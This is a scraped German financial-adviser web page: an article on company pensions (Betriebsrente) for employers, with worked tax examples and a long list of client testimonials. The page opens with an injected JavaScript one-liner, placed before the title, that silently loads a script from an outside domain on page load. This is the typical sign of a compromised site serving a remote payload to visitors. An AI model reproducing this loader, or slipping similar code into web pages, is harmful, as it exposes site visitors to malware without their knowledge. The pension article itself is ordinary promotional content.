;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Die Betriebsrente – sehr beliebt, aber vielfach noch leider unbekannt

Dipl. Wirtschafts-Ing. Thomas Eckert | Telefon +49 (2151) 47 98 26 8 | E-Mail info@vermoegensberatung-eckert.de

Die Betriebsrente – sehr beliebt, aber vielfach noch leider unbekannt

21. Mai 2014

Die betriebliche Altersversorgung genießt bei Arbeitnehmern Vertrauen und einen guten Ruf – und dennoch ist die Kenntnis darüber erstaunlich gering. Dieses Phänomen beschränkt sich aber nicht auf die Arbeitnehmer. Auch auf Seiten der Arbeitgeber bestehen große Wissenslücken.

Wichtiger Baustein angesichts sinkender gesetzlicher Renten

Wer einen materiell abgesicherten Lebensstandard im Alter genießen möchte, muss heute mehr denn je zusätzlich vorsorgen. Die Versorgung zusätzlich zur gesetzlichen Rentegewinnt damit an Bedeutung. Die betriebliche Altersversorgung (bAV) bietet hervorragende Möglichkeiten, um mit geringem Aufwand Versorgungslücken zu schließen. Umfragen bestätigen seit langem, dass die Betriebsrente im Vergleich zu anderen betrieblichen Sozialleistungen unter Mitarbeitern besonders beliebt ist. Die Arbeitnehmer sind sich inzwischen bewusst, dass die gesetzliche Rente allein nicht reichen wird. Das Sparen aus dem Nettogehalt stößt oftmals an Grenzen. Eine Zusatzrente vom Chefkommt in dieser Situation gut an. Übrigens ist auch die Versorgung von in der Firma mitarbeitenden Familienangehörigen oder der Gesellschafter- Geschäftsführer einer GmbH über die bAV möglich.

Kein Zwang zur gleichen

Betriebsrente für alle Arbeitnehmer Die Belegschaft eines Unternehmens setzt sich oftmals nicht aus Mitarbeitern zusammen, die gleichrangig sind oder gleiches Gehalt beziehen. Diese Struktur kann auch bei der Gestaltung der bAV berücksichtigt werden. Entscheiden Sie sich als Arbeitgeber für betriebliche Altersversorgung, muss dies nicht zwingend für alle Arbeitnehmer in gleicher Weise geschehen. Grundsätzlich ist die betriebliche Altersversorgung ein Teil des Entgelts für geleistete Dienste. Sie können auch die bAV als Teil der Entlohnungsstruktur nutzen. Als Arbeitgeber können Sie zum Beispiel einzelnen Arbeitnehmern auf Grund ihrer Leistungen oder ihrer Bedeutung für das Unternehmen, wie bei individuellen Gehaltserhöhungen, eine Betriebsrentenzusage erteilen. In ähnlicher Weise können Sie auch herausgehobenen Gruppen, zum Beispiel Führungskräften, Versorgungsleistungen versprechen.

Keine Angst vor der Betriebsrente in kleinen Betrieben

Eine repräsentative Umfrage des Marktforschungsinstitutes YouGov-Psychonomics kam zu dem nicht überraschenden Ergebnis, dass die Verbreitung der betrieblichen Altersversorgung nach Unternehmensgröße sehr unterschiedlich ist. Aus meiner Erfahrung heraus haben in großen Unternehmen oft mehr als 80 Prozent der Mitarbeiter eine Betriebsrentenzusage, ist die Verbreitung bei kleinen Unternehmen geringer und betrifft nur circa jede dritte Firma mit bis zu fünf Beschäftigten. Häufig haben die Firmenchefs Berührungsängste mit diesem Thema, fürchten Risiken oder zu hohen Verwaltungsaufwand. Dabei wird oft übersehen, welche Vorteile die betriebliche Altersversorgung insbesondere auch kleinen Unternehmen bieten kann. Auch sie brauchen engagierte und qualifizierte Mitarbeiter und konkurrieren am Arbeitsmarkt mit den größeren Unternehmen. Eine Betriebsrente hilft, um bei potenziellen neuen Mitarbeitern zu punkten oder den vorhandenen Mitarbeiterbestand besser an das Unternehmen zu binden. Zusätzlicher Verwaltungsaufwand entsteht dabei kaum. Wird die Betriebsrente zum Beispiel in Form einer Direktversicherung durchgeführt, dann liegt der hauptsächliche Verwaltungsaufwand beim Versicherer.

„Motivation zum Nulltarif“ oder Kosteneinsparung – bAV macht’s möglich

Aus Sicht des Arbeitgebers bedeutet eine Betriebsrentenzusage nicht zwingend einen Kostenanstieg. Die Mitarbeiter haben nach dem Betriebsrentengesetz ohnehin einen gesetzlichen Anspruch darauf, Teile ihres Gehaltes zugunsten einer Betriebsrentenzusage umzuwandeln. Hierdurch können Steuern und sowohl beim Arbeitnehmer als auch beim Arbeitgeber Sozialversicherungsbeiträge gespart werden. Geben Sie als Arbeitgeber diese Ersparnis ganz oder teilweise in Form eines Beitragszuschusses für die Betriebsrente weiter, erreichen Sie eine Verbesserung der „Motivation zum Nulltarif“ oder können sogar noch Kosten einsparen.

Die Variante „bAV statt Gehaltserhöhung“ ist eine weitere interessante Alternative. Sie bringt beiden Seiten Vorteile. Das wir an einem einfachen Beispiel recht deutlich. Eine monatliche Gehaltserhöhung von 100 Euro verursacht beim Arbeitgeber durch den Arbeitgeberanteil zur Sozialversicherung monatliche Kosten in Höhe von circa 120 Euro. Bei einem Arbeitnehmer mit einem Bruttogehalt in Höhe von 2.000 Euro und Steuerklasse I/0 kommen davon netto gerade noch circa 52 Euro an. Verwendet der Arbeitgeber dagegen monatlich 100 Euro zugunsten einer Betriebsrentenzusage, dann entstehen keine Lohnnebenkosten, und jeder Euro fließt in die Verbesserung der Altersversorgung des Mitarbeiters. Für einen 30-jährigen Arbeitnehmer könnte auf diese Weise zum Beispiel eine zusätzliche lebenslange monatliche Altersrente in Höhe von circa 613 Euro finanziert werden.

Betriebsrente als Mitarbeitererfolgsbeteiligung

Eine Betriebsrentenzusage kann auch zur Mitarbeitererfolgsbeteiligung genutzt werden. Sie als Arbeitgeber zahlen zum Beispiel einen geringen monatlichen Beitrag für die Direktversicherung Ihrer Mitarbeiter. Diesen Beitrag stocken Sie jährlich um einen erfolgsabhängigen Sonderbeitrag auf, der an das jeweilige Betriebsergebnis gekoppelt wird. Ihre Mitarbeiter werden so motiviert, und Sie als Arbeitgeber erhalten Planungssicherheit, weil der Aufwand immer vom Unternehmensergebnis abhängt. Eine andere Form zur Teilhabe der Mitarbeiter am Unternehmenserfolg ist die Zusage des Arbeitgebers, den Aufwand für die bAV jeweils nur für einen vorher festgelegten Zeitraum zu gewähren und sich dann jeweils neu zu entscheiden.

Betriebsrente: richtige Gestaltung = kein Risiko für den Arbeitgeber

Auf Seiten der Arbeitgeber besteht auf Grund mangelnder Vertrautheit mit dem Thema betriebliche Altersversorgung oft die Befürchtung, mit einer Versorgungszusage unkalkulierbare finanzielle Risiken einzugehen. Dies kann bei Durchführung der bAV über Versicherungsverträge minimiert werden. Versicherungsunternehmen unterliegen den strengen Kapitalanlagevorschriften des Versicherungsaufsichtsgesetzes. Der Inhalt der Versorgungszusage ist bei richtiger Gestaltung identisch mit der Leistung aus dem Versicherungsvertrag. Unter anderem deshalb hat der Gesetzgeber die Direktversicherung bei der Umsetzung des Entgeltumwandlungsanspruchs der Arbeitnehmer als bevorzugten Durchführungsweg vorgesehen.

Maßgeschneiderte Versorgungskonzepte für verschiedene Mitarbeitergruppen klug kombiniert – erfolgreich mit System

In einem zeitgemäßen Versorgungsmodell können Sie als Arbeitgeber auch Ihre Vorstellungen für die Belohnung unterschiedlicher Mitarbeitergruppen berücksichtigen. In diesen Fällen wählen Sie für die Entgeltumwandlung mit einem freiwilligen Arbeitgeberzuschuss die Direktversicherung. Soweit deren steuerlicher Förderrahmen überschritten wird oder für die Versorgung von Gutverdienenden und Führungskräften bieten Sie die Versorgung über eine Unterstützungskasse an. Auch hier kann es sich sowohl um reine Arbeitgeberfinanzierung als auch um Entgeltumwandlung handeln.

Fazit:

Auf die gesetzliche Rentenversicherung allein kann sich kein Arbeitnehmer mehr verlassen. Die Betriebsrente genießt hohe Wertschätzung bei den Mitarbeiterinnen und Mitarbeitern. Sie wird eine zunehmende Rolle bei der Personalgewinnung und der Entlohnung von qualifizierten Mitarbeitern spielen. Eine bAV über eine Direktversicherung ist eine besonders vorteilhafte Lösung, um die Versorgungssituation mit vergleichsweise geringem Aufwand erheblich zu verbessern. Arbeitgeber und Arbeitnehmer, die die Vorteile nicht nutzen, verzichten auf eine attraktive staatliche Unterstützung. Die Betriebsrente setzt aus Sicht des Arbeitgebers überzeugende materielle und personalpolitische Akzente. Insbesondere viele kleine Unternehmen nutzen diese Vorteile oft nicht konsequent und lassen sich dadurch wertvolle Vorteile entgehen. Ein Gespräch mit einem kompetenten Versorgungsspezialisten ist daher sehr empfehlenswert und wird sich für jedes Unternehmen lohnen.

Ich berate Sie gerne – Rufen Sie mich einfach an!

Referenzen

Das sagen Kunden über mich als ihren persönlichen Berater

Ehrliche Kundenbewertungen sind die beste Entscheidungsgrundlage für die Wahl eines Beraters.

Annika S. (Bochum) - Pflegedienstleitung

Herr Eckert ist mir ein sehr zuverlässiger Finanzberater, den ich jederzeit erreichen kann und der mir mit persönlichem Engagement immer und in allen Fragen kompetent zur Seite steht. Mit unvermindertem Einsatz kümmert er sich auch um bereits seit längerem bestehende Verträge.

Yvonne J. (Oberhausen) - MFA

Seit sehr vielen Jahren hat Herr Eckert mein vollstes Vertrauen und ich kann mir keinen anderen Berater mehr vorstellen. Egal um welche Fragen es geht, er hat immer ein offenes Ohr und versucht das bestmöglichste für seine Kunden. Ganz besonders fand ich es, das er mich zu meinem Arbeitgeber begleitet hat, als es um meine betriebliche Altersvorsorge ging. Und als wir uns überlegt haben eine Eigentumswohnung zu kaufen, da gab es so viele Fragen und er war immer für uns da. Ich bin sehr zufrieden…

Julia M. (Unna) - Versicherungskauffrau

Herr Eckert hat uns stets bestens beraten. Sehr professionell und hat für uns das beste Finanzierungsangebot unterbreitet. Er kümmert sich sofort um alle Belange und hat mit seinem Netzwerk der Düsseldorfer Runde Experten zu allen Themenbereichen verfügbar. Das ist wirklich klasse! Herr Eckert hat unser vollstes Vertrauen!

Julia K. (Schermbeck) - Krankenschwester

Wir sind nun schon lange unter Herrn Eckerts Obhut und sind zu 100% zufrieden. Er ist immer erreichbar, verlässlich und sehr vertrauenswürdig. Er geht individuell auf unsere Bedürfnisse ein, berücksichtigt unsere finanziellen Möglichkeiten und was in unserem Alter sinnvoll ist abzuschließen und wofür man sich auch noch Zeit lassen kann. Wir würden zu niemand anderem gehen.

Heiko R. (Dorsten) - Projektleiter

Herr Eckert ist zeitlich flexibel und umfassend beratend. Wir haben viele Bereiche prüfen lassen und auch mal gute Kritiken bekommen für Abschlüsse, die noch vor seiner Beratungszeit. Wünsche nach Angeboten wurden so zu sagen „Schlüsselfertig“ vorbereitet und vertrauensvoll abgeschlossen. Wir sind sehr zufrieden mit íhm und haben keine Mängel an seiner Arbeit. Immer wieder gerne von ihm beraten zu werden. Absolut empfehlenswert !!

Dominik D. (Köln) - Projektingenieur

Ich kenne Thomas durchs Studium und bin froh jemanden zu haben, dem ich blind vertrauen kann. Ein Anruf, eine Mail, und alles wird sofort eingeleitet. Sehr zuverlässig und sehr kompetent. Da muss man sich keine Sorgen mehr machen.

Ulrike W. (Marl) - Lohnsteuerberaterin

Herr Eckert ist ein sehr zuverlässiger Berater, immer zu erreichen oder ruft sofort zurück. Er ist sehr bemüht ein optimales Ergebnis zu erzielen, damit wir als Kunden zufrieden sind. Ein Berater der unser Vertrauen hat und den wir gerne weiter empfehlen.

Tino H. (Recklinghausen) - Florist

Ich bin seit Jahren Mandant bei Herrn Eckert. Ich kann nur Gutes berichten und fühle mich wirklich richtig gut beraten! In den letzten Jahren wurde mir immer mit Rat und Tat bei Seite gestanden,und ich bin wirklich zufrieden! Ich habe das Gefühl das ich bei Herrn Eckert gut aufgehoben bin und man sich wirklich um meine Anliegen und Probleme kümmert. Ich werde nicht vertröstet, oder via Brief ins Büro zu deren Sprechzeiten gebeten!!Herr Eckert versucht sogar telefonisch Dinge zu klären, da ich selten in sein Büro kann!! Ich habe oft das Gefühl das ich hierbei das RUND-UM-SORGLOS-PAKET habe!

Christina B. (Haltern am See) - Goldschmiedin

Ich bin schon sehr lange Kundin von Herrn Eckert. Bei Fragen steht er mir jeder Zeit zu Verfügung und hilft immer prompt wo es nur geht. Das Engagement von Herrn Eckert, sowie seine Zuverlässigkeit sind wirklich hervorragend. Ich könnte mir keinen besseren Berater vorstellen. Wirklich zu empfehlen. Alles Top.

Annika K. (Düsseldorf) - Opernsängerin

Herr Eckert hat mich sehr kompetent in Angelegenheiten von Versicherungen und Altersvorsorge beraten. Die von ihm empfohlenen Produkte sind sehr gut und auf meine Bedürfnisse optimal angepasst. Im Besonderen bin ich positiv beeindruckt von seiner Auffassung von Kundenservice. […] Diese sehr ehrliche und korrekte Art, seinen Beruf auszuüben, zeichnet Herrn Eckert aus. Für mich ist er ein sehr kompetenter, vertrauenswürdiger und integrer Berater, den ich jederzeit weiterempfehlen würde.

Thomas M. (Brühl) - Industriemechaniker

Ich kenne Thomas Eckert schon viele Jahre. Er hat mich bis zum heutigen Tage (und mit Sicherheit auch in den nächsten Jahrzehnten) in all meinen Finanziellen oder Versicherungstechnischen belangen zu meiner vollsten Zufriedenheit Beraten. Er kümmert sich schnell, zuverlässig und mit hohem Engagement um meine Belange und erinnert mich stets an meinen zu erledigenden Papierkram (Finanzielles / Versicherungstechnisches) Ich kann Thomas Eckert nur wärmstens weiterempfehlen.

Ullrich A. (Bochum) - Apotheker

Thomas Eckert ist äußerst kompetent, sachlich, sehr zuverlässig, erklärt spezielle Fragen auch solange und öfters, bis die Antworten verstanden sind, legt sich wichtige Termine auf Wiedervorlage, damit wirklich nichts „anbrennt“, kann ich unbedingt und ohne jede Einschränkung jedem empfehlen, der sich um die Verwaltung seines (auch sehr kleinen!!) Vermögens nicht alleine kümmern will.

Nora K. (Witten) - Apothekerin

Bei unserer Baufinanzierung im Jahr 2005 hat uns Herr Eckert schon sehr gut beraten und für uns die besten Konditionen herausgeholt. Als jetzt die Umschuldung anstand hatte er alle Termine im Überblick und uns wieder fachlich überzeugt. Vielen Dank für die tolle Betreuung!

Rainer B. (Essen) - Controller

Neben seiner stark ausgeprägten Kundenorientierung und hohen fachlichen Kompetenz schätze ich an Thomas Eckert besonders sein nachhaltiges Engagement bei der Klärung jeder Fragestellung. Auch nach inzwischen acht Jahren, in denen Thomas Eckert mich und meine Familie erfolgreich berät, überzeugt mich immer wieder, dass er für mich und meine Fragen jederzeit ein offenes Ohr hat und insbesondere, dass ich mich auf eine umgehende Antwort und Lösung des Problems verlassen kann.

Dean P. (Mülheim) - Gebietsverkaufsleiter

Herr Eckert begleitet mich nun schon seit mehreren Jahren, wobei Vertrauen, die Vermittlung zu guten und vor allem nötigen und sinnvollen Produkten immer im Vordergrund stehen. Auf Herrn Eckert ist Verlass, wenn nicht sofort erreichbar, kommt immer ein zeitnaher Rückruf eine kompetente und verlässliche Beratung und das Gefühl für die Zukunft, mit seiner Hilfe alles richtig gemacht zu haben.

Norbert L. (Herten) - Kaufmännischer Angestellter

Ohne die Meinung von Thomas Eckert werde ich keine Entscheidung mehr treffen. Endlich mal ein Finanz- und Versicherungsberater, der nicht nur verkaufen will, sondern ehrlich und bedarfsgerecht berät. Ihn kann man mit ruhigem Gewissen weiterempfehlen.

Michael K. (Schermbeck) - Elektrotechniker

Meine große Zufriedenheit in der Beratung durch Herrn Eckert basiert auf der Tatsache, dass er wirklich weiß wovon er spricht. Er ist ein sehr guter Zuhörer, analysiert und hinterfragt. Die Ergebnisse können sich wirklich sehen lassen, ich empfehle Herrn Eckert sehr gerne weiter.

David-Charles K. (Witten) - Informatiker

Die kompetente und sehr freundliche Beratung bei den ersten Kontakten vermittelte ein sehr gutes Start-„Gefühl“, welches sich über die vielen Jahre der Betreuung gehalten und verstärkt hat. Mittlerweile hat sich ein Vertrauen aufgebaut, welches wir nicht erwartet hatten und freuen uns sehr, jemanden wie Thomas Eckert an unserer Seite zu wissen. Wir freuen uns auf die kommenden Projekte! Danke.

Michael S. (Bochum) - Gymnasiallehrer

Herr Eckert hat uns vollumfassend und kompetent zu den Themen Bausparen und Riester-Rente beraten. Auch die „Nachsorge“ läuft hervorragend. Ich empfehle ihn uneingeschränkt weiter!

Heike F. (Dülmen) - Rentnerin

Ich bin sehr dankbar, in einer schwierigen Lebenssituation jemanden „an der Seite“ zu haben, der sich persönlich, kompetent und vertrauensvoll um alles kümmert, wovon ich nicht genug Ahnung habe und es mir auch noch verständlich machen kann. Ob es um meine eigene Riesterrente, alle anstehenden Neuversicherungen der Kinder bei Einstieg ins Berufsleben oder die Einschätzung und Neuregelung aller sonstigen Versicherungsangelegenheiten geht, Herr Eckert hat sich immer wieder zeitnah für uns eingesetzt und uns dabei vor allem durchgehend auch super informiert. Eine Betreuung, die ich gerne immer wieder weiterempfehle.